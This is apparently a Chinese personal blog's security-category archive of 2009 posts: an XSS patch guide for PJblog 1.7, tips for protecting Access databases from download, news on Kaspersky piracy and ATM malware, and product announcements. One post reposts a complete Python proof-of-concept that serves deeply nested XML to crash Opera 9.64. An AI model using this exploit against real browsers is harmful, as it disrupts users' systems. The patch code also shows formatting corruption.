分类 "网络安全" 的存档.

PJblog 170版本安全漏洞补丁

      今天早上到Pj的官方论坛一看,看到置顶主题赫然写着pjblog170重要安全补丁发布,到网上转了转找到了漏洞利用工具,实际上是一个XSS,可以获得管理员的sha1密码。有人给出了php和VBS的利用脚本,因为本地没有装php,就用VBS跑了一下自己的博客,果然爆出了sha1密码~~
      然后就是按照论坛上的方法打补丁,因为之前我的代码自己改过,没有完全按照官方的来,所以不能直接覆盖文件升级,而要手动修改代码升级。共计4个文件,虽然不懂一点asp,但以前也依葫芦画瓢的改过代码,有些信心的。因为论坛上有很多人都出错,所以很小心,一口气把9页回复都看完,综合了一下意见才用Ultracompare对比新旧文件改的。不想还是出问题了,先是检测防xss的函数放错了地方,我说在emeditor里面怎么不能自动高亮呢;改好之后以为OK了,前后台都没有问题,试着发表日志时来了问题。日志发表完毕之后内容并不能写入数据库,因此返回文章时得不到文章ID,当时想着真崩溃,检查了好多地方也没找出原因,后来看了blogpost.asp里包括的文件,确定文件是出在class/cls_logAction.asp上,因为里面改的地方很多,就从服务器上把原来没改过的拉到本地覆盖再改。这一次不跟新的补丁文件对比修改了,直接按照论坛上的要求改了一个地方,保存,然后OK,将更改文件全部再传到服务器上,也没有问题,再用那个VBS利用脚本一检测,本地和服务器都没有漏洞了,这才松了口气。这前后大约用了3个小时。
      附上从官网copy过来的补丁修补方法(注:适用于157-170版本的Pj):
      需修改文件:根目录Action.asp
      将 request("cname") 改成 Checkxss(request.QueryString("cname"))
      将 request("mainurl") 改成 Checkxss(request.QueryString("mainurl"))
      将 request("main") 改成 Checkxss(request.QueryString("main"))

      需修改文件:common/function.asp,在文件中增加一个函数:

复制内容到剪贴板程序代码程序代码
'*************************************
'防XSS注入函数 更新于2009-04-21 by evio
'与checkstr()相比, checkxss更加安全
'*************************************
Function Checkxss(byVal ChkStr)
    Dim Str
    Str = ChkStr
    If IsNull(Str) Then
        CheckStr = ""
        Exit Function
    End If
    Str = Replace(Str, "&", "&")
    Str = Replace(Str, "'", "´")
    Str = Replace(Str, """", """)
        Str = Replace(Str, "<", "<")
        Str = Replace(Str, ">", ">")
        Str = Replace(Str, "/", "/")
        Str = Replace(Str, "*", "*")
    Dim re
    Set re = New RegExp
    re.IgnoreCase = True
    re.Global = True
    re.Pattern = "(w)(here)"
    Str = re.Replace(Str, "$1here")
    re.Pattern = "(s)(elect)"
    Str = re.Replace(Str, "$1elect")
    re.Pattern = "(i)(nsert)"
    Str = re.Replace(Str, "$1nsert")
    re.Pattern = "(c)(reate)"
 &
nbsp;  Str = re.Replace(Str, "$1reate")
    re.Pattern = "(d)(rop)"
    Str = re.Replace(Str, "$1rop")
    re.Pattern = "(a)(lter)"
    Str = re.Replace(Str, "$1lter")
    re.Pattern = "(d)(elete)"
    Str = re.Replace(Str, "$1elete")
    re.Pattern = "(u)(pdate)"
    Str = re.Replace(Str, "$1pdate")
    re.Pattern = "(\s)(or)"
    Str = re.Replace(Str, "$1or")
        re.Pattern = "(\n)"
    Str = re.Replace(Str, "$1or")
        '———————————-
        re.Pattern = "(java)(script)"
    Str = re.Replace(Str, "$1script")
        re.Pattern = "(j)(script)"
    Str = re.Replace(Str, "$1script")
        re.Pattern = "(vb)(script)"
    Str = re.Replace(Str, "$1script")
        '———————————-
        If Instr(Str, "e­xpression") > 0 Then
                Str = Replace(Str, "e­xpression", "e", 1, 1, 0) '防止xss注入
        End If
    Set re = Nothing
    Checkxss = Str
End Function

      修改文件:class/cls_logAction.asp
      找到:

复制内容到剪贴板程序代码程序代码
oldcname = request.form("oldcname")
                oldcate = request.form("oldcate")
                oldctype = request.form("oldtype")

      替换为:

复制内容到剪贴板程序代码程序代码
oldcname = Checkxss(request.form("oldcname"))
                oldcate = Checkxss(request.form("o
ldcate"
))
                oldctype = Checkxss(request.form("oldtype"))

      修改文件:GetArticle.asp
      找到:

复制内容到剪贴板程序代码程序代码
blog_postFile = request("blog_postFile")

      替换为:

复制内容到剪贴板程序代码程序代码
blog_postFile = Cint(Checkxss(request.QueryString("blog_postFile")))

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/243

卡巴斯基称中国盗版用达8000万 无意完全打击

      昨天下午,卡巴斯基亚太区董事总经理张立申透露,卡巴斯基目前在中国的盗版用户已经达到了8000万,不过公司目前并没有完全在针对盗版用户进行打击。张立申表示,目前卡巴斯基在中国每天有20万激活码被领用,按照这样的进度,今年再增加3000万的用户应该没有问题。由于卡巴斯基现在在中国的收入稳定,市场增长迅速,卡巴斯基不会效仿微软的做法,打击盗版用户,用户只要通过该公司公布的合法途径,就能得到激活码。

      不过他也同时坦承,卡巴斯基目前还没有特别好的方案完全应对盗版现象。

  之前有分析人士认为,卡巴斯基之所以纵容盗版用户,是在沿用国际厂商在中国惯用的“先圈地、后收钱”伎俩,对此,张立申予了坚决否认,在他看来,杀毒软件与操作系统类的产品是完全不同的产品,“杀毒软件讲究的是用户体验,一款好的产品是绝对不会免费的。”

  市场份额方面,张立申则透露道,目前卡巴斯基的用户数量已经排在首位,但其收入以及企业版、网络版的用户仍落后于瑞星公司。尽管该公司创始人尤金卡巴斯基一再强调,卡巴斯基要坐上中国杀毒市场的头把交椅。但按照目前的发展速度,该公司三年后才能如愿。
      0point评点:谁能保证卡巴真的能信守自己的诺言,如果它真的做上了国内杀软第一把交椅,那时能否继续宽容这些盗版用户就不得而知了。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/253

access数据库安全漫谈–防止access数据库非法下载方法浅析

      access数据库因为其自身缺陷,很容易被非法下载,特别是如果在没有更改后缀名和程序默认路径的情况下,对asp类型网站造成了非常大的安全隐患。这里就介绍几种方法来阻止access数据库如何防止非法下载。

      1.发挥你的想象力 修改数据库文件名
      不用说,这是最最偷懒的方法,但是若攻击者通过第三方途径获得了数据库的路径),就玩完了。比如说攻击者本来只能拿到list权 ,结果意外看到了数据库路径,就可以冠冕堂皇地把数据库下载回去研究了。另外,数据文件通常大小都比较大,起再隐蔽的文件名都瞒 不了人。故保密性为最低。

      2.数据库名后缀改为ASA、ASP等

      此法须配合一些要进行一些设置,否则就会出现本文开头的那种情况
      (1)二进制字段添加(什么,你不会?其实我也不会。[face68] 那就去down一个雷客图安全助手,它提供的一项安全辅助功能就是向asp数据库中添加 notdownload 二进制字段)。

      (2)在这个文件中加入<%或%>,IIS就会按ASP语法来解析,然后就会报告500错误,自然不能下载了。可是 如果只是简单的在数据库的文本或者备注字段加入<%是没用的,因为ACCESS会对其中的内容进行处理,在数据库里他会以 < %的形式存在,无效!正确的方法是将<%存入OLE对象字段里,这样我们的目的就能达到了。方法:
      首先,用notepad新建一个内容为 <% 的 文本文件,随便起个名字存档。
  接着,用Access打开您的数据库文件,新建一个表,随便起个名字,在表中添加一个OLE对象的字段,然后添加一个记录, 插入之前建立的文本文件,如果操作正确的话,应该可以看到一个新的名为"数据包"的记录。即可

      3.数据库名前加"#"
  只需要把数据库文件前名加上#、然后修改数据库连接文件(如conn.asp)中的数据库地址。原理是下载的时候只能识别& nbsp;#号前名的部分,对于后面的自动去掉,比如你要下载:http://www.ylmf.com/date/# 123.mdb(假设存在的话)。无论是IE还是FLASHGET等下到的都是http://www.test.com/date/index.htm(index.asp、default.jsp等你在IIS设置的首页文档)
  另外在数据库文件名中保留一些空格也起到类似作用,由于HTTP协议对地址解析的特殊性,空格会被编码为"%",如http ://www.test.com/date/123 456.mdb,下载的时http://www. test.com/date/123 %456.mdb。而我们的目录就根本没有123%456.mdb这个文件,所 以下载也是无效的这样的修改后,即使你暴露了数据库地址,一般情况下别人也是无法下载!

      4.加密数据库
  首先在选取"工具->安全->加密/解密数据库,选取数据库(如:employer.mdb),然后接确定,接 着会出现"数据库加密后另存为"的窗口,存为:employer1.mdb。接着employer.mdb就会被编码,然后存为 employer1.mdb..要注意的是,以上的动作并不是对数据库设置密码,而只是对数据库文件加以编码,目的是为了防止他 人使用别的工具来查看数据库文件的内容。
接下来我们为数据库加密,首先以打开经过编码了的 e mployer1.mdb,在打开时,选择"独占"方式。然后选取功能表的"工具->安全->设置数据库密码", 接着输入密码即可。这样即使他人得到了employer1.mdb文件,没有密码他是无法看到 emplo yer1.mdb的。
  加密后要修改数据库连接页, 如:
      conn.open "driver={microsoft access driver&nb sp;(*.mdb)};uid=admin;pwd=数据库密码;dbq=数据库路径"
  这样修改后,数据库即使被人下载了,别人也无法打开(前提是你的数据库连接页中的密码没有被泄露)
  但值得注意的是,由于Access数据库的加密机制比较简单,即使设置了密码,解密也很容易。该数据库系统通过将用户输入的 密码与某一固定密钥进行"异或"来形成一个加密串,并将其存储在*.mdb文件从地址"&H42"开始的区域内。所以一 个好的程序员可以轻松制作一个几十行的小程序就可以轻松地获得任何Access数据库的密码。因此,只要数据库被下载,其信息安 全依然是个未知数。

      5.数据库放在WEB目录外或将数据库连接文件放到其他虚拟目录下
  如你的WEB目录是e:\webroot,可以把数据库放到e:\data这个文件夹里,在e:\webroot里的数据库 连接页中修改数据库连接地址为:"../data/数据库名" 的形式,这样数据库可以正常调用,但是无法下载的,因 为它不在WEB目录里!这个方法一般也不适合购买虚拟空间的用户。

      6.使用ODBC数据源。
  在ASP等程序设计中,如果有条件,应尽量使用ODBC数据源,不要把数据库名写在程序中,否则,数据库名将随ASP源代码 的失密而一同失密,例如: DBPath = Server.MapPath("../123/ abc/asfadf.mdb ")
conn.open "driver={Microsoft Access Driver&nb sp;(*.mdb)};dbq="& DBPath
  可见,即使数据库名字起得再怪异,隐藏的目录再深,ASP源代码失密后,也很容易被下载下来。如果使用ODBC数据源,就不 会存在这样的问题了: conn.open "ODBC-DSN名" ,不过这样是比较烦的,目 录移动的话又要重新设置数据源了,更方便的方法请看第7,8法!

      7.添加数据库名的如MDB的扩展映射
  这个方法就是通过修改IIS设置来实现,适合有IIS控制权的朋友,不适合购买虚拟主机用户(除非管理员已经设置了)。这个 方法我认为是目前最好的。只要修改一处,整个站点的数据库都可以防止被下载。无须修改代码即使暴露目标地址也可以防止下载。&n bsp;
  我们在IIS属性—主目录—配置—映射—应用程序扩展那里添加.mdb文件的应用解析。注意这里的选择的D LL(或EXE等)似乎也不是任意的,选择不当,这个MDB文件还是可以被下载的, 注意最好不要选择选 择asp.dll等。你可以自己多测试下
  这样修改后下载数据库如:http://www.test.com/data/dvbbs6.mdb。就出现(404或50 0等错误)

     8:使用.net的优越性
  动网的木鸟就写过一个防非法下载文件的"WBAL 防盗链工具"。具体可以登陆http://www.9seek .com/WBAL/ ;
  不过 那个只实现了防止非本地下载的 ,没有起到真正的防下载数据库的功能。不过这个方法已经跟5法差 不多可以通过修改.NET文件,实现本地也不能下载!

  这几个方法中,只有第7和8个是统一性改的,一次修改配置后,整个站
点的数据库都可以防止下载,其他几个就要分别修改数据库 名和连接文件,比较麻烦,不过对于虚拟主机的朋友也只能这样了!

  其实第6个方法应该是第5个方法的扩展,可以实现特殊的功能,但对于不支持.net的主机或者怕设置麻烦的话,还是直接用第 5个方法了,而且默认情况下第6个方法,依然可以通过复制连接到同主机的论坛或留言本发表,然后就可以点击下载了(因为这样的引 用页是来自同主机的)

      9.利用NTFS分区的文件权限设置(by percyboy)
      我们已经知道,ASP.NET 中使用 ADO.NET 访问数据库,通过 OleDb 的连接可以访问 Access 数据库— —我们非常常用的低端数据库之一。本文讨论了 ASP.NET 中可能看到的若干错误提示,从中看到&nb sp;Access 2000 和 Access XP 创建的数据库文件 ,在访问出现错误时会出现不太相同的错误提示。希望对大家有所帮助。另一个要点是,希望通过此文,使大家对 ASP. NET 中 Access 数据库文件的 NTFS 权限设置有所新的认识 。

      一)实验过程
      为了叙述方便,举个具体例子做个实验:应用程序为 /test ,数据库存放在 D:\wwwr oot\test\data\db1.mdb,我们已经知道在 ASP.NET 中是以一个叫做 ;ASPNET 虚拟用户的身份访问数据库的,我们需要给这个账户以特定的 NTFS 权限才能 使 ASP.NET 程序正常运行。

      为了得到最严格的 NTFS 权限设置,实验开始时我们给程序最低的 NTFS 权限 :
      a) D:\wwwroot\test\data\ 文件夹的给用户ASPNET 以如下权限:
      允许 拒绝
      完全控制 &n bsp; □ & nbsp;□
      修改 &nbs p; &nbs p;□ □
      读取及运行 & nbsp; √ □ ;
      列出文件夹目录 ; √ □
      读取 &nbs p; &nbs p;√ □
      写入 &nbs p; &nbs p;□ □

      b) D:\wwwroot\test\data\db1.mdb 文件本身给用户ASPNET以如下权限:
      √ 允许将来自父系的可继承权限传播给该 对象

      1.1 对于某个只包含有"Select"命令的aspx程序,上述权限设置运行时无障碍,即:上述权限 已经满足这类程序的运行了。

      1.2 对于包含有"Update""Insert""Update"等命令的aspx程序;
      (a) 如果 db1.mdb 是 Access 2000 创 建的数据库,出现如下错误:
      "/test"应用程序中的服务器错误。
      —————————————
      Microsoft Jet 数据库引擎打不开文件'D:\wwwroot\test\data\'。&n bsp;它已经被别的用户以独占方式打开,或没有查看数据的权限。
      说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误 以及代码中导致错误的出处的详细信息。
      异常详细信息: System.Data.OleDb.OleDbException: Microsof t Jet 数据库引擎打不开文件'D:\wwwroot\test\data\'。 它已经被 别的用户以独占方式打开,或没有查看数据的权限。

       10. 删除数据库文件扩展名
        此方法由绿色兵团成员乱雪提出,原理如下:
        数据库真实路径:www.test.com/data/123.mdb,删除扩展名后路径变为 www.test.com/data/123,而根据IIS的解析规则,它会把123当做一个目录而不是一个文件看待,自然它会尝试寻找123目录下的默认文档显示,实际上自然是做不到的,也就因此达到了避免显示和下载的功能。不过在测试时遇到一个例外,在XP系统下,仍然是可以下载的;但在2kn系统上则不能下载。(估计没有几个服务器会选择XP作为服务器系统,所以这个方法也值得尝试)
       在这几种方法中,个人认为采用ODBC方式连接数据库最为安全,因为它允许将数据库文件放置在与程序不同目录下,而且不会在程序源代码中出现数据库的真实路径。配合NTFS文件权限设置,可以将90%以上的数据库非法下载者挡在门外,当然,如果服务器被拿下那就另当别论了。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/269

Opera 9.64 XML Parsing Remote Crash Exploit

    Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit

复制内容到剪贴板程序代码程序代码
#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   – Similar to the bug found by Wojciech Pawlikowski for Firefox
#     -> http://www.milw0rm.com/exploits/8306
#
#   – Tested using the latest version of Opera (9.64)
#
#   Usage  : python opera.py [port]
#    

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):
        
    def get_exploit(self):
        exploit = '<A>' * 7400
        exploit = '<xml>' + exploit + '</xml>'
        return exploit
            
    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        if self.path == '/':
            print
            print '[-] Incoming connection from %s' % self.client_address[0]
            print '[-] Sending header to %s …' % self.client_address[0]
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            print '[-] Header sent to %s' % self.client_address[0]
            print '[-] Sending exploit to %s …' % self.client_address[0]
            self.wfile.write(self.get_exploit())
            print '[-] Exploit sent to %s' % self.client_address[0]

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except KeyboardInterrupt:
                print '[-] Exiting …'
        except socket.error:
            print '

  • ERROR: a socket error has occurred …'
            sys.exit(-1)    
        except ValueError:
            print '
  • ERROR: invalid port number …'
            sys.exit(-1)
                
    if __name__ == '__main__':
        main()

    # milw0rm.com

  • [2009-03-30]

    转载请尊重版权,出处:秋天博客
    本文链接: https://www.cfresh.net/web-security/275

    中网S3最新免费版本3.6.0.1简介与下载

    来源:麦田守望者
    http://www.2000xg.com/

    中网S3是一款4D齐全的主动防御个人安全产品。
      (1)网络防护(Network Defense,简称ND):基于miniport的Windows的状态检测包过滤防火墙;基于TDI的应用访问网络控制防火墙;基于MAC的链路层ARP防火墙;Anti-DDOS防火墙。
      (2)应用防护(Application Defense,简称AD):在Windows上增加系统自主访问控制和基于规则的强制访问控制;应用作为主体的权限控制;应用作为客体的完整性保护。
      (3)文件防护(File Defense,简称FD):文件作为客体的完整性保护。
      (4)注册表防护(Registry Defense,简称RD):注册表作为客体的完整性保护。
      中网S3还是一款强大的4M系统监控工具。
      (1)自动启动监控(Autoruns Monitor,简称AM),监控对象包括:登录时运行的程序,资源管理器插件,IE浏览器插件,系统服务,驱动程序,计划任务,打印机监控,Winsock Providers ,LSA Providers ,Winlogon Notify,App Inits ,Known Dlls 等。
      (2)运行进程实时监控(Process Monitor,简称PM)。
      (3)网络状态实时监控(Netstat Monitor,简称NM)。
      (4)日志实时审计监控(Log Monitor,简称LM)。
      中网S3主机安全系统,可以解决网络攻击、网络入侵、僵尸网络、社会工程攻击、蠕虫病毒、间谍木马软件等系列安全问题。
      如果你需要:
      一款功能强大的Windows防火墙(FIREWALL),
      一款Windows主机入侵检测(HIDS)和防御系统(HIPS),
      一款Windows主机完整性保护软件(Integrity Protection),
      一款Windows蠕虫病毒免疫系统(Anti-WORM),
      一款积极防御的Windows的防间谍软件(Anti-SPYWARE)等,
      中网S3主机安全系统可能是你合适的选择。
      中网S3最新免费版本3.6.0.1下载:
      http://liveupdate.netchina.com.cn/s3v3_6/ncs3_3.6.0_setup.exe
      最近更新:
      2009-1-21
      更新内容:
      1.修改了与ncappctl相关在Windows 2003下面非白名单程序无界面主题的bug;
      2.修改了规则无法保存,ncdsgui.exe频繁写规则被拒绝,询问框不断弹出的bug;
      3.修改了几个和内存指针相关的bug。
      2009-1-19
      更新内容:
      1.针对这两天出现的bug,进行了修改,内容涉及检查PE文件头的有效性,其中有些指针没有检查。
      2.针对使用comodo提的clt.exe进行了测试,发现了一些问题,并做了针对性处理。
      2009-1-16
      更新内容:
      1.提供对vista的支持
      2.更新规则数据库引擎
      3.解决和360safebox软件的兼容性问题
      4.对最新的Matousec测评,提供更新版本
      5.增加对SetParent、AttachThreadInput等函数的拦截
      6.增加对拦截入口的检查和保护
      7.对规则的检查,减少冗余函数调用造成的性能损失
      8.通过DriverVerify测试,解决驱动和应用层交互中出现的bug
      9.对程序执行实现资源管理器扩展,允许用户以低用户权限级别执行程序

    转载请尊重版权,出处:秋天博客
    本文链接: https://www.cfresh.net/web-security/276

    安全聚焦:危机四伏的ATM取款机

          【IT专家网独家】随着攻击技术的日新月异,针对自动取款机的攻击事件已不再是新闻:我们见到过使用嗅探器攻击ATM,还有使用伪造身份(钓鱼攻 击)成功进入ATM,甚至有人利用物理手段攻击ATM。但是最近一种新的针对ATM的攻击方式(向ATM机器插入盗取信息的恶意代码),引起了所有人对 ATM安全的关注。
          Sophos最近研究发现,Diebold ATM机器中装有能够窃取用户信息的木马程序,Diebold公司在一月份针对其windows系统的Opteva ATM机发布了一项新的安全更新,当时已经表示在俄罗斯发现部分机器被物理性攻击并被渗透木马软件。 Diebold公司发言人表示,“我们立即通知全球范围内的客户关于该恶意软件的风险,并发布了风险防范软件更新,我们意识到俄罗斯发生的事件的危险性,攻击者通过在ATM所在位置物理进入ATM机器,然后让拥有专业黑客技术的攻击者安装恶意软件。” Sophos的资深技术顾问Graham Cluley表示,“攻击者十分精通ATM取款机内部软件,能够精通到这种程度确实让人刮目相看,他们知道API调用,了解现金机器的运行方式,攻击者的精心准备让我们颇为意外。” “这不是一般攻击者能够达到的水平,”他补充说,“他们首先需要真正进入到ATM机器中,需要有人在里面处理这些设备以进入系统并安装软件。” 目前还不清楚攻击者怎样进入取款机内部的,但是安全专家表示,这代表着一种对银行机器的全新攻击方式,而且这个可能只是整个攻击的皮毛而已。可能有许多地方的ATM被安装了这种类型的恶意隐藏木马。 Diebold公司在其对ATM机器的安全更新中对客户表示,攻击者已经被抓获,正在进行调查。一旦攻击者能够进行ATM机器内部,他们就能够植入恶意软件和拦截敏感数据。当windows管理密码被获取或者内置防火墙禁用时,这种攻击的风险就会增加。与此同时,Solidcore公司一月份时从其ATM客户处初次了解到Diebold攻击,Solidcore公司的OEM解决方案首席技术官 Kishore Yerrapragada表示,攻击者去年年底通过IP连接感染机器的,攻击者们非常熟悉ATM机器内部和外部的构造以及运行方式。专家表示,攻击者将机器转换到所谓的“维修或者系统模式”,这时候安全保护和加密就因为调试或者系统维护而被关闭,只有对系统内部非常了解的人才可能做到这一点,这能够使黑客通过木马获取ATM机器的数据。此次发现的木马软件能够收集PIN码以及所谓的Track 2加密数据(存储在ATM卡的磁条上),这能够使攻击者复制真正的ATM卡。然后攻击者会插入自己特质的卡到被木马感染的ATM机器进入帐户系统,取款机就会通过机器系统打印出被窃取的信息。
          Sophos的Cluley谈到攻击时说,“这种攻击方式的最大优势在于,你不能发现ATM机器被动过手脚,完全是在内部进行的。” 这种攻击与近日发生在欧洲的攻击相类似,大型连锁超市的几个结账读卡器被发现内置了嗅探器,攻击者在生产过程中就进行了安装,因此从外面根本看不出来被破坏了。专家透露,这些被攻击超市包括位于英国Asda的沃尔玛超市。然而,这种有针对性的ATM攻击不可能取代低成本、即插即用、全网络钓鱼攻击窃取银行帐户的攻击方式。大多数犯罪分子无法进入ATM机器内部,虽然这种方式十分诱人。这些攻击也暴露了这些取款机的安全弱点,Network Box的安全分析专家Simon Heron表示,“我希望看到ATM机器向支付处理器发送信息时通过SSL VPN加密或者某种VPN连接加密。这些ATM机器同样还需要更多的硬件保护,包括IDS/IPS防火墙等。” ATM机器中通常都会有运行时间和变化控制工具来检测可疑活动,因此系统不能只是进行周边防护,需要加强另一层防护以防止对系统的更改。 Sophos公司的Cluley说道,“这次的ATM攻击事件对于ATM制造商来说应该是一次警醒,所有生产ATM设备或者银行设备的厂商在创造和生产这些设备的时候需要确保这些系统是安全的,必须确保全过程没有被交换或者修改过。”

          0point后记:国内那些利用门禁系统轻松获取银行卡卡号的行为已经让我大为瞠目了,没想到国外已经开始在将ATM改造成养马场了,一句话:没有做不到,只有想不到。

    转载请尊重版权,出处:秋天博客
    本文链接: https://www.cfresh.net/web-security/278

    金山毒霸首推免费肉鸡检测器

    来源:cnbeta

          3月23日上午,金山毒霸云安全中心对外宣称,专门针对“肉鸡”电脑的“金山毒霸肉鸡检测器”已正式上线。该产品旨在为广大互联网用户解除越发严重的“肉鸡”威胁。由此,一场轰轰烈烈的“全民剿杀肉鸡”行动全面展开。金山毒霸反病毒专家李铁军表示,“从广义上讲,遭遇木马攻击的电脑均可以称为肉鸡。”金山毒霸云安全中心监测数据显示,截止至本月19日,09年以来全国累计超过3800万台次计算机遭遇木马攻击,其中专门针对网银的木马暴涨近10倍。互联网用户的财产安全面临巨大威胁。

        据悉,沦为“肉鸡”的电脑,除了央视315晚会曝光的网银帐号受到威胁外,黑客还可以轻易获得用户的炒股帐号、网游帐号密码等信息。此外,远程控制用户的摄像头,曝光隐私;窃取“肉鸡”电脑里的虚拟财产以及商业机密。李铁军表示,“肉鸡已经成为黑客牟利的工具”。

          为了维护整个互联网安全环境,让广大网民摆脱“肉鸡”威胁,金山毒霸紧急推出了“肉鸡检测器”,全面剿杀肉鸡。金山毒霸肉鸡检测器采用金山毒霸先进的可信 认证及威胁判断技术,准确鉴定文件安全性。多达156项病毒加载项的检测,已经覆盖病毒所有已经采用的加载技术,全面检测不遗漏;独有的Anti- rootkit技术深入系统底层,纵使采用了“隐身术”的后门或远程控制程序,也都在“肉鸡检测器”下乖乖现身。

          此外“肉鸡检测器”还采用加强版抢杀技术,强力清除顽固文件,所有毒瘤重启后瞬间灰飞烟灭。“金山毒霸肉鸡检测器还对于流行木马、后门破坏导致的系统异常,一键修复,真正做到用户的贴心小棉袄。”金山毒霸反病毒工程师表示。

          金山毒霸高级副总裁葛珂指出,“肉鸡已经成为威胁互联网安全的一个重要因素。作为安全厂商,金山有责任、有义务将权威的病毒信息提供给普通用户,让其具有防范意识,同时更为重要的是为用户提供切实的解决方案,全面解决用户问题。”

          业内人士指出,央视315晚会让广大用户认识了“肉鸡”,再加之各大媒体对病毒产业链的深入报道,一度让用户陷入了对网络安全的恐慌之中。金山适时推出“ 肉鸡检测器”产品,既能够切实帮助用户解决问题,同时也在一定程度上缓解用户的恐惧心理。对整个互联网安全起到积极作用。

          金山毒霸肉鸡检测器下载地址:http://www.duba.net/zt/rouji/
          
          正在猜想,这个肉鸡检测器与杀软、防木马软件有何不同之处呢?

    转载请尊重版权,出处:秋天博客
    本文链接: https://www.cfresh.net/web-security/279